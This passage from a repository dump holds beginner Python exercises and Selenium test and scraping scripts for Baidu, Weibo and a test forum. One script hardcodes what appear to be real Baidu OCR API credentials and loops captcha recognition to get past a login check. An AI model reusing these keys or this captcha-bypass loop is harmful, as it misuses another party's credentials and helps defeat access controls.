[value for value in range(1, 5)]\nprint(sum(number1))\n\nprint(square2[0:3]) # 切片 0到3位\nprint(square)\nprint(square2[:3])\n\n# 遍历\nfor value in square2[0:2]:\n print(value)\n\nsquare3 = square2[:]\nprint(square3)\nsquare2.append(29)\nsquare3.append(22)\nprint(square2)\nprint(square3)\n\nnumber2 = (1, 2)\n# number2[0] = 3 报错 无法修改元组的值\nprint(number2[0])\nprint(number2[1])\n\nnumber2 = (3, 4) # 再次赋值\nprint(number2[0])\nprint(number2[1])\n\n# tuple(number) 元组转列表\n\n# if语句------------------------------------------------------------------------------\nprint(square1)\nfor value in square1:\n if value == 4: # == 为相等 !=为不等\n print(value)\n else:\n 
print(\"ll\")\nfor value in square1:\n if value >= 9 and value <= 10: # and 为并列 or为或者\n print(value)\n else:\n print(0)\nif 5 not in square1: # not in 特定值不在数组中\n print(\"shi\")\nprint((3, 4) == number2) # 打印布尔类型 number2 =(3,4)\n\nnumber = 19\nif number >= 18:\n print(\"大于18\")\nelif number == 18:\n print(\"等于18\") # elif 多个使用,可以省略else\nelse:\n print(\"小于18\")\n\nif 4 in square1:\n print(\"ye\") # if 可以多个使用\nif 9 in square1:\n print(\"o ye\")\n\nif 4 in square1:\n print(\"不打印9\")\nelif 9 in square1: # if通过不运行elif\n print(\"o ye\")\n\nfor value in square1:\n if value == 9:\n print(\"打酒\") # 检查特殊元素\n else:\n print(value)\nsquare = [1, 2]\nif square:\n print(\"非空\")\nelse:\n print(\"空\")\nfor value in square:\n if value in square1: # 判断数组1的值在数组2中么\n print(\"有\")\n else:\n print(\"空\")\n# 字典值-------------------------------------------------------------------------------\ndog_0 = {'color': 'black', 'points': 1} # {} 键值\nprint(dog_0['color'])\nprint(dog_0['points'])\nprint(\"打印\" + dog_0['color']) # str和int不能相加\nprint(\"打印\" + str(dog_0['points'])) # 强制转换\nprint(dog_0)\ndog_0['name'] = 'tt' # 添加键值\ndog_0['age'] = 'dd'\nprint(dog_0)\n\ndog_1 = {}\ndog_1['color'] = 'red'\ndog_1['age'] = 2\nprint(dog_1)\ndog_1['color'] = 'green'\nprint(dog_1)\n# 键值的更新\nalien_0 = {'x_position': 0, 'y_position': 0, 'speed': 'medium'}\nprint(\"初始位置:\" + str(alien_0['x_position']))\nif alien_0['speed'] == 'slow':\n x_increment = 1\nelif alien_0['speed'] == 'medium':\n x_increment = 2\nelse:\n x_increment = 3\nalien_0['x_position'] = alien_0['x_position'] + x_increment\nprint(\"此时位置:\" + str(alien_0['x_position']))\n\n# del必须指定字典名和要删除的键名\ndel dog_0['color']\nprint(dog_0)\n# 遍历所有的键-值对\nfavorite_language = {\n 'jen': 'python',\n 'mike': 'java',\n 'phil': 'c',\n 'tom': 'python',\n}\nprint(\"jen \\t\" + favorite_language['jen'])\nfor name, language in favorite_language.items(): # items 返回一个键和一个值\n print(\"name:\" + name + \"languare :\" + language)\n\nfor name in favorite_language.keys(): # 获取所有的键, 可以去除keys 输出不变\n print(name)\nfriends = ['tom', 'mike']\nfor name in favorite_language.keys():\n if name in friends:\n print(name + \"\\t\" + language)\n\n# 按顺序遍历所有值\nfor name in sorted(favorite_language, reverse=False):\n print(name)\n# 遍历字典中的所有值 valus(),set去重\nfor language in set(favorite_language.values()):\n print(language)\ndog_2 = {'coloe': 'black', 'age': 2}\ndogs = [dog_0, dog_1, dog_2]\nfor dog in dogs:\n print(dog)\n\ndogs = []\nfor dog_nymber in range(30): # 创建30个字典\n new_dog = {'color': 'red', 'age': 3}\n dogs.append(new_dog)\nprint(str(len(dogs))) # 打印30个\nfor dog in dogs[0:3]:\n if dog['color'] == 'red':\n dog['color'] = 'yellow' # 增加键和值\n dog['speed'] = 'medium'\nfor dog in dogs[:5]: # 打印前5个\n print(dog)\n# 字典中存储列表\nfavorite_language = {\n 'jen': ['python', 'ruby'],\n 'mike': 'java',\n 'phil': ['c', 'java'],\n 'tom': ['python', 'haskill']\n}\nfor name, language in favorite_language.items():\n print(name.title() + ':')\n for language_1 in language:\n print(language_1.title())\n\nusers = {\n 'user1': {\n 'name': 'alien',\n 'age': 4,\n 'location': 'aaa'\n },\n 'user2': {\n 'name': 'blown',\n 'age': 5,\n 'location': 'bbb'\n },\n 'user3': {\n 'name': 'mike',\n 'age': 6,\n 'location': 'ccc'\n }\n}\nfor user_name, users_info in users.items():\n print('name:' + user_name + '\\t age:' + str(users_info['age']) + '\\tlocation:' + users_info['location'])\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7753846049308777, "avg_line_length": 39.6875, "blob_id": "ade1a4774318792044104d25606b6f8bd98022b7", 
"content_id": "58ca2381447a600c1fd84778d074b60e963a0644", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 114, "num_lines": 16, "path": "/src/test/test/weibo.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport selenium.webdriver.support.expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome()\ndriver.get('https://weibo.com/')\n\ntime.sleep(15)\ndriver.implicitly_wait(100)\n#driver.find_element_by_css_selector('input[id=\"loginname\"]').send_keys('111111')\nele= WebDriverWait(driver,25,0.1).until(EC.presence_of_element_located((By.CSS_SELECTOR,'input[id=\"loginname\"]')))\nele.send_keys('12345')\ndriver.find_element_by_css_selector('div.info_list.password input[name=\"password\"]').send_keys('111111')" }, { "alpha_fraction": 0.6258503198623657, "alphanum_fraction": 0.6365403532981873, "avg_line_length": 28.97087287902832, "blob_id": "a8ae1a1a29ec01c0ccd799f9169ff5bbc083ebfa", "content_id": "c1ad6e1f344e690178afc80b2f28a263f67e8cfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "no_license", "max_line_length": 89, "num_lines": 103, "path": "/src/test/test/work.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\n2 爬取百度贴吧,将抓取到的内容 存放到csv⽂件中\n3 最终结果格式如下:\n4 data.csv\n5 标题,内容\n6 回复:听说最近耽美⽂超⽕哦《匠⼼》,孙茂顿时急了\n\n12 \"\"\"\n\n\n'''document.querySelector()'''\ndef price():\n from selenium import webdriver\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n\n driver = webdriver.Chrome()\n\n driver.get('https://www.baidu.com')\n driver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\n driver.find_element_by_xpath('//*[@id=\"su\"]').click()\n time.sleep(5)\n driver.find_element_by_css_selector('div.ec-pl-clean-inner-gap.ec-pc_title').click()\n #driver.maximize_window()\n time.sleep(5)\n #print(driver.current_url) #查询当前windows页面url\n #print(driver.window_handles)\n driver.switch_to.window(driver.window_handles[-1])\n #driver.switch_to.window(driver.window_handles[0]) #切换到前一个页面\n driver.find_element_by_xpath('//input[@id=\\'searchKeywords\\']').send_keys('iphone11')\n # driver.find_element_by_css_selector('div.search-keyword-box').click()\n # driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n # driver.find_element_by_css_selector('input.search-keyword').send_keys('iphone11')\n driver.find_element_by_css_selector('input.search-btn').click()\n\n #price=driver.find_element_by_css_selector('span.def-price').text\n prices=driver.find_elements_by_css_selector('span.def-price')\n print(len(prices))\n\n time.sleep(3)\n # print(f'第一台:{prices[0].text}')\n # print(f'最后一台:{prices[-1].text}')\n lastprice = prices[-1]\n c =lastprice.location_once_scrolled_into_view\n time.sleep(10)\n #ActionChains.\n print(lastprice.text)\n driver.close()\n\ndef baidu():\n from selenium import webdriver\n from selenium.common.exceptions import NoSuchElementException\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n driver = webdriver.Chrome()\n\n driver.get('https://www.baidu.com')\n driver.find_element_by_xpath('//a[@name=\\'tj_trtieba\\']').click()\n driver.find_element_by_xpath('//input[@name = \\'kw1\\']').send_keys('孙茂书')\n 
driver.find_element_by_xpath('//a[@class= \\'search_btn j_search_post\\']').click()\n time.sleep(3)\n #span.p_title div.s_post>div.p_content\n\n alltitles=[]\n def craw1_title():\n alltitles1 = driver.find_elements_by_css_selector('span.p_title')\n for ele in alltitles1:\n #print(ele.text)\n alltitles.append(ele.text)\n\n contents = []\n def craw1_content():\n contents1 = driver.find_elements_by_css_selector('div.p_content')\n for ele in contents1:\n #print(ele.text)\n contents.append(ele.text)\n\n\n\n\n\n while True:\n try:\n craw1_title()\n craw1_content()\n driver.find_element_by_css_selector('a[class=\\'next\\']').click()\n time.sleep(2)\n except NoSuchElementException:\n print('最后一页')\n driver.quit()\n break\n c={}\n for i in range(len(contents)):\n c[alltitles[i]]=contents[i]\n\n print(c)\n\n\nif __name__ == '__main__':\n price()\n #baidu()\n" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.6132478713989258, "avg_line_length": 37.66666793823242, "blob_id": "2e685d29a8c049e313532631884a3a6690bbf7f5", "content_id": "9fca4d0b250333498a5e0bee026849502b4b5373", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 152, "num_lines": 12, "path": "/src/work/day3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import json\n\nwith open('haproxy.cfg','r',encoding='utf-8') as f:\n list_1=list(f.readlines())\n print(list_1)\n#{\"backend\": \"test.oldboy.org\",\"record\":{\"server\": \"100.1.7.9\",\"weight\": 20,\"maxconn\": 3000}}\njson1 = input('输入:')\ndef re(json1):\n dic_1 = json.loads(json1)\n dic_2 = 'server %s %s weight%s maxconn%s'%(dic_1['record']['server'],dic_1['record']['server'],dic_1['record']['weight'],dic_1['record']['maxconn'])\n return dic_2\nprint(re(json1))\n\n\n\n\n" }, { "alpha_fraction": 0.5425823926925659, "alphanum_fraction": 0.5425823926925659, "avg_line_length": 23.266666412353516, "blob_id": "575def1f16def7448e667c275c2d0f91eddaebfb", "content_id": "7de67e37c2de2fde6b4773f016ef401586dfef91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/src/testcase/name_function.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def get_formatted_name(first, last, middle=''): # 默认值写最后方\n \"\"\"生成完整姓名\"\"\"\n if middle:\n full_name = first + \" \" + middle + \" \" + last\n else:\n full_name = first + \" \" + last\n return full_name.title()\n\n\nclass AnoymoisSurey():\n \"\"\"收集匿名问卷调查\"\"\"\n\n def __init__(self, question):\n \"\"\"存储一个问题,并为记录答案准备\"\"\"\n self.question = question\n self.responses = []\n\n def show_question(self):\n \"\"\"显示问卷\"\"\"\n print(self.question)\n\n def store_response(self, new_response):\n \"\"\"存储单份调查问卷\"\"\"\n self.responses.append(new_response)\n\n def show_results(self):\n \"\"\"显示收集到的结果\"\"\"\n print(\"result:\")\n for response in self.responses:\n print(response)\n" }, { "alpha_fraction": 0.6093366146087646, "alphanum_fraction": 0.6093366146087646, "avg_line_length": 39.70000076293945, "blob_id": "a53012329cd80f235edcad1a0ac9c8fab2768191", "content_id": "9d06ff4df6b091779de3323b60251ebc4259ef26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 57, "num_lines": 10, "path": "/src/doc_1/files_write.py", "repo_name": 
"qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "filename = 'programming.txt'\nwith open(filename,'w') as file_object: #覆盖得写\n file_object.write(\"sa\\n\")\n file_object.write(\"sjdsfaj\\n\")\nwith open(filename,'a') as file_object: #末尾添加\n file_object.write('aaaaaa\\n')\n file_object.write('bbbbbbb\\n')\nwith open('programming.txt') as file_object:\n contens = file_object.read() #读\n print(contens.rstrip())\n" }, { "alpha_fraction": 0.6331727504730225, "alphanum_fraction": 0.6572608351707458, "avg_line_length": 31.155555725097656, "blob_id": "b787369a7b530324fe64d1264fdb7bf0c54b8af0", "content_id": "9df06c1234083a0f825647806865a913d9e0bf49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 121, "num_lines": 45, "path": "/src/test/seleium_2.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from aip import AipOcr\nfrom selenium import webdriver\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nclient = AipOcr('18237057','U7Z6NnsQNOLkdTWITItGgf1w','9cRLl0ZMWQCEkFxQeb73zC4feFsCry4e')\n\ndriver = webdriver.Chrome()\ndriver.get('http://47.100.225.199/index.php?s=/index/user/logininfo.html')\n\ndriver.find_element_by_name('accounts').send_keys('helloworld')\ndriver.find_element_by_name('pwd').send_keys('123456')\n\n\n#返回验证码\ndef get_verifycode(filePath):\n verycode = ''\n with open(filePath, 'rb') as fp:\n ret = fp.read() #返回文件流\n res= client.basicGeneral(ret) #识别后的结果\n for i in res['words_result']:\n word=i['words'].replace(' ','')\n verycode+=word\n return verycode\n\n\nwhile True:\n try:\n img = driver.find_element_by_id('form-verify-img')\n img.screenshot('./img1.png')\n t = get_verifycode('img1.png')\n verify_input = driver.find_element_by_name('verify')\n verify_input.clear()\n verify_input.send_keys(t)\n time.sleep(1)\n driver.find_element_by_css_selector('div.am-form-group.am-form-group-refreshing>button[type=\\'submit\\']').click()\n\n img.click() #更换图片\n time.sleep(1)\n ActionChains(driver).move_by_offset(0, 0).perform()\n time.sleep(1)\n except NoSuchElementException:\n break\nprint('succes')\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4811568856239319, "alphanum_fraction": 0.49255040287971497, "avg_line_length": 39.75, "blob_id": "ef6b651f3c14c15e5142a6237af642f393c3b4b7", "content_id": "0dd742d7c7f91083837ee780ad5abaa34134076c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1371, "license_type": "no_license", "max_line_length": 74, "num_lines": 28, "path": "/src/doc_1/file_reader.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class path_1:\n#open()打开文件 传参文件名,返回一个对象\n#with在不需要访问时进行关闭,也可以使用closed,但是若程序出错导致文件损坏\n with open('pi_digits.txt') as file_object:\n contens = file_object.read() #read进行读取所有内容,结尾会多次空行\n print(contens.rstrip()) #rsplit()将结果打印成数组,rstrip()去除空行\n print(\"--------------------------------------------------\")\nclass path_2:\n with open('test\\_test_1.txt') as file_object1: # \\用于相对路径\n for line in file_object1: #逐行读取\n print(line.rstrip())\n print(\"--------------------------------------------------\")\nclass path_3:\n file_path =\"D:/ptest.txt\" # 绝对路径\n with open(file_path, encoding='utf-8') as file_object2:\n lines = file_object2.readlines() # readlines读取每一行,存储在列表中\n pi_string = ''\n for line in lines:\n print(line.rstrip())\n pi_string += 
line.strip() #删除空格\n print(pi_string)\n print(len(pi_string))\n print(pi_string[:52]+\".....\") #打印前52位\n birthday = input(\"输入数字:\")\n if birthday in pi_string:\n print(\"ok\")\n else:\n print(\"wrong\")\n" }, { "alpha_fraction": 0.5354131460189819, "alphanum_fraction": 0.5396289825439453, "avg_line_length": 30.210525512695312, "blob_id": "d7b567e1d0d6d0275ab26342113bc0b052af7d09", "content_id": "e585a9acdd92e9d58b6dae2a6b378b21cd4a3f1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 81, "num_lines": 38, "path": "/src/yichang_10/division.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "try:\n print(5/0) #若此行正确,则跳过ZeroDivisionError;否则执行下方print\nexcept ZeroDivisionError:\n print('wrong')\n\nprint(\"Give me two number,and I'll divide them\")\nprint(\"Enter 'q' to quit\")\n\nwhile True: #若输入0 则报错\n first_number = input(\"\\n firstnumber: \")\n if first_number == 'q' :\n break\n second_number = input(\"secondnumber: \")\n try:\n if second_number == 'q':\n break\n answer = int(first_number)/int(second_number)\n except ZeroDivisionError:\n print(\"You are wrong!\")\n else: #依赖于try ,成功执行的代码放到else\n print(answer)\n\ndef count_word(filename):\n try:\n with open(filename) as f_ob:\n contents= f_ob.read()\n print(contents)\n except FileNotFoundError: #文件找不到,则执行下面操作\n #pass 不做任何提示错误时\n print(\"wrong\")\n else:\n words = contents.split()\n num_words = len(words)\n print(filename+\" \\n\"+str(num_words))\n\nfilenames = ['..\\doc_1\\pi_digits.txt','..\\doc_1\\programming.txt','sddjakdj.txt']\nfor folename in filenames:\n count_word(folename)\n" }, { "alpha_fraction": 0.5821596384048462, "alphanum_fraction": 0.5821596384048462, "avg_line_length": 21.85714340209961, "blob_id": "86a9a87ba0464d4b3f0578d7530553600992448a", "content_id": "e152c17b144f1cb211dc1c98df63cfb7e6211303", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 92, "num_lines": 28, "path": "/src/pytest_v/pom/edittopic.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from user import Singdriver\n\nclass EditTopicPage:\n\n def __init__(self):\n self.driver = Singdriver()\n\n @property\n def breadcrumb_text(self):\n '''\n :return: 导航栏\n '''\n return self.driver.find_element_by_css_selector('li.active').text\n\n @property\n def error_message(self):\n return self.driver.find_element_by_css_selector('div.alert.alert-error strong').text\n\n @property\n def alert_msg_text(self):\n '''\n 切换到alert获取文字,并点击确定关闭\n :return:\n '''\n alert = self.driver.switch_to.alert\n text = alert.text\n alert.accept()\n return text" }, { "alpha_fraction": 0.5702576041221619, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 32.509803771972656, "blob_id": "f8b89a7cdb2ed186af4eec345cfddd82a7e9d8dc", "content_id": "86c5dfb90c736196fbbd773648079eb993742fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 107, "num_lines": 51, "path": "/src/pytest_v/bussiness/test_user.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom singdriver import Singdriver\nclass test_login:\n '''\n 用户登陆\n '''\n def __init__(self):\n self.driver = Singdriver()\n\n def test_login(self):\n \"\"\"\n 测试登陆\n 
:return:\n \"\"\"\n # driver = webdriver.Chrome()\n self.driver.get('http://39.107.96.138:3000/signin')\n self.driver.find_element_by_css_selector('#name').send_keys(\"testuser1\")\n self.driver.find_element_by_css_selector('#pass').send_keys('123456')\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n # 添加断言\n # 1.登录成功应该跳转到首页\n current_url = self.driver.current_url\n assert current_url == \"http://39.107.96.138:3000/\", \"应该跳转到首页\"\n\n # 2. 用户名应该为testuser1\n username = self.driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n print('sssss'+username)\n #assert username == \"testuser1\", \"登录用户名应该为testuser1\"\n\n def test_sendmail(self):\n '''\n 发帖\n :return:\n '''\n self.driver.get(\"http://39.107.96.138:3000/signin\")\n\n self.driver.find_element_by_id('name').send_keys(\"testuser1\")\n self.driver.find_element_by_id('pass').send_keys('123456')\n\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n self.driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = self.driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(self.driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()" }, { "alpha_fraction": 0.45373666286468506, "alphanum_fraction": 0.4973309636116028, "avg_line_length": 19.071428298950195, "blob_id": "978b54be4f3cd38eb599276ebf775142b87066f2", "content_id": "1262dec3d0d7e6cac4b54628baeb495122a2796d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 76, "num_lines": 56, "path": "/src/learn/day4_递归.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def cale(n):\n print(n)\n if n / 2 > 1:\n return cale(n / 2)\n print('N:', n)\n\n\ncale(100)\n\n\ndef cale1(n):\n print(n)\n if n / 2 > 1:\n res = cale1(n / 2) # res = 10 5=5(res =5) 2.5(res =2.5) 1.25\n print('res:', res)\n\n print('N:', n)\n return n\n\n\ncale1(10)\n\n'''斐波那契数列'''\n\n\ndef fun(arg1, arg2, stop):\n if arg1 == 0:\n print(arg1, '\\n', arg2)\n arg3 = arg1 + arg2\n print(arg3)\n if arg3 < stop:\n fun(arg2, arg3, stop)\n\n\n'''二分法'''\n\n\ndef binary_search(date_source, find_n):\n mid = int(len(date_source) / 2)\n if len(date_source) >= 1:\n if date_source[mid] > find_n:\n print('data in left of [%s]' % date_source[mid])\n binary_search(date_source[:mid], find_n)\n elif date_source[mid] < find_n:\n print('data in right of [%s]' % date_source[mid])\n binary_search(date_source[mid:], find_n)\n else:\n print('found fin_s', date_source[mid])\n else:\n print('cannot find...')\n\n\nif __name__ == '__main__':\n date = list(range(1, 60000, 4))\n # print(date)\n binary_search(date, 1)\n" }, { "alpha_fraction": 0.7580645084381104, "alphanum_fraction": 0.774193525314331, "avg_line_length": 24, "blob_id": "91d8e3864414e60593916b4e7c229f21ae07f22f", "content_id": "c6c62c76716540de7ac36f7328a377d22afb3629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/src/test_9_6/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from test_9_6 import Restaurant\n\nname = Restaurant('ice-restaurant','ice')\nname.describe_restaurant()\nname.open_restaurant()" }, { "alpha_fraction": 0.7313961982727051, "alphanum_fraction": 0.7455705404281616, 
"avg_line_length": 37.16216278076172, "blob_id": "23128619c22db0bf034b4c30b52781304f831f87", "content_id": "35cf1655a42e5c38d4b526e9e3e66c63ccbd3c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "no_license", "max_line_length": 85, "num_lines": 37, "path": "/src/test/test/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\ndriver.get('https://www.baidu.com')\ndriver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\ndriver.find_element_by_xpath('//*[@id=\"su\"]').click()\ntime.sleep(5)\ndriver.find_element_by_css_selector('div.ec-pl-clean-inner-gap.ec-pc_title').click()\n# driver.maximize_window()\ntime.sleep(5)\n# print(driver.current_url) #查询当前windows页面url\n# print(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[-1])\n#driver.switch_to.window(driver.window_handles[0]) # 切换到前一个页面\ndriver.find_element_by_xpath('//input[@id=\\'searchKeywords\\']').send_keys('iphone11')\n# driver.find_element_by_css_selector('div.search-keyword-box').click()\n# driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n# driver.find_element_by_css_selector('input.search-keyword').send_keys('iphone11')\ndriver.find_element_by_css_selector('input.search-btn').click()\n\n#price=driver.find_element_by_css_selector('span.def-price').text\nprices = driver.find_elements_by_css_selector('span.def-price')\ndriver.execute_script(\"window.scrollBy(0,4000)\")\n\nprint(len(prices))\n\ntime.sleep(3)\n# print(f'第一台:{prices[0].text}')\n# print(f'最后一台:{prices[-1].text}')\nlastprice = prices[-1]\nc = lastprice.location_once_scrolled_into_view\ntime.sleep(10)\n# ActionChains.\nprint(lastprice.text)" }, { "alpha_fraction": 0.6169611215591431, "alphanum_fraction": 0.6402826905250549, "avg_line_length": 19.521739959716797, "blob_id": "5416fdbf4c5368fbb1a1bb520dcbfc56373f8ba5", "content_id": "46aa4f4a404fe22213098db572b81546cf7e6e87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1601, "license_type": "no_license", "max_line_length": 98, "num_lines": 69, "path": "/src/pytest_v/testcase/test_login.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom singdriver import Singdriver\nfrom user import UserAction\nimport utils\nimport os\nuseraction = UserAction()\n\ndriver = Singdriver()\n\ndef setup_module():\n '''\n 执行案例前的操作\n :return:\n '''\n useraction.user_login()\n\ndef teardown_module():\n '''\n 执行所有测试用例后的操作\n :return:\n '''\n driver.quit()\n\ndef teardown():\n '''\n 执行每条测试用例后,截屏\n :return:\n '''\n dirname = utils.get_screen_shot()\n filename = utils.get_png_file_name()\n f = os.path.join(dirname,filename)\n driver.save_screenshot(f+'.png')\n\n\ndef test_login():\n \"\"\"\n 测试登陆\n :return:\n \"\"\"\n #useraction.user_login()\n\n # 添加断言\n # 1.登录成功应该跳转到首页\n current_url = driver.current_url\n assert current_url==\"http://39.107.96.138:3000/\",\"应该跳转到首页\"\n\n # 2. 
用户名应该为testuser1\n username = driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n #print('sssss'+username)\n assert username == \"testuser1\",\"登录用户名应该为testuser1\"\n\n\n\ndef test_register():\n '''\n 发帖\n :return:\n '''\n #driver = webdriver.Chrome()\n\n driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()" }, { "alpha_fraction": 0.47974684834480286, "alphanum_fraction": 0.49873417615890503, "avg_line_length": 17.83333396911621, "blob_id": "c77752bc689eef201c2bf607432e6dd5ef485b75", "content_id": "27a141b376f2c7529e6b32cdf6a983045d97d186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/src/Unit2/9-19.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''1、用户输入一个数值,请判断用户输入的是否为偶数?\n是偶数输出True,不是输出False(提示:input输入的不管是什么,\n都会被转换成字符串,自己扩展,想办法将字符串转换为数值类型,再做判段)'''\n\n# class print_num() :\n# num = input('num = ')\n# try:\n# num = int(num)\n# if num%2 == 0 :\n# print('true')\n# else:\n# print('false')\n# except Exception:\n# print(\"格式错误\")\n\n'''卖橘子的计算器:写一段代码,提示用户输入橘子的价格,然后随机生成购买的斤数(5到10斤之间),最后计算出应该支付的金额!'''\n#\n# def foo():\n# print(\"starting...\")\n# while True:\n# res = yield 4\n# print(\"res:\", res)\n# g = foo()\n# print(next(g))\n# # print(\"*\" * 20)\n# print(next(g))\n\ndef fib(max):\n n,a,b=0,0,1\n while n<max:\n yield b\n a,b=b,a+b\n n = n+1\n\nfor n in fib(5):\n print(n)\n\n\n\n# if __name__ == '__main__':\n# # print_num\n# count_friut.fib(9)" }, { "alpha_fraction": 0.5879396796226501, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 18.850000381469727, "blob_id": "e82c4923b266c4073dfba650b52fc8eb1b9595c4", "content_id": "7c7975a3e05ec8365171ae1b940a9d4b4173a35e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 466, "license_type": "no_license", "max_line_length": 63, "num_lines": 20, "path": "/src/pytest_v/common/utils.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import os\nimport time\n\n\ndef get_screen_shot():\n '''\n 项目根目录下不存在screnshoots目录,那就创建一个\n :return: screenshots的绝对路径\n '''\n if os.path.isdir('../screnshoots') is False:\n os.mkdir('../screnshoots')\n return os.path.abspath('../screnshoots')\n\n\ndef get_png_file_name():\n '''\n 返回文件名年_月_日_时_分_秒\n :return:\n '''\n return time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime())\n\n" }, { "alpha_fraction": 0.6744759678840637, "alphanum_fraction": 0.6954377293586731, "avg_line_length": 35.727272033691406, "blob_id": "bfa1fcde282960c0d09f82354dc6ab175a0e37d5", "content_id": "470e5f763c69f4f451c5708587336a5736214cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 160, "num_lines": 22, "path": "/src/test/webtest/test_1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "# div.DiscoveryNews h2>span\n# //div[@id=\"col-discovery\"]//h2/span[1]\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n#滚动\ndriver = webdriver.Chrome()\ndriver.get('http://news.baidu.com/')\njs1 = 'window.scrollTo(0,5000)'\njs2 = 
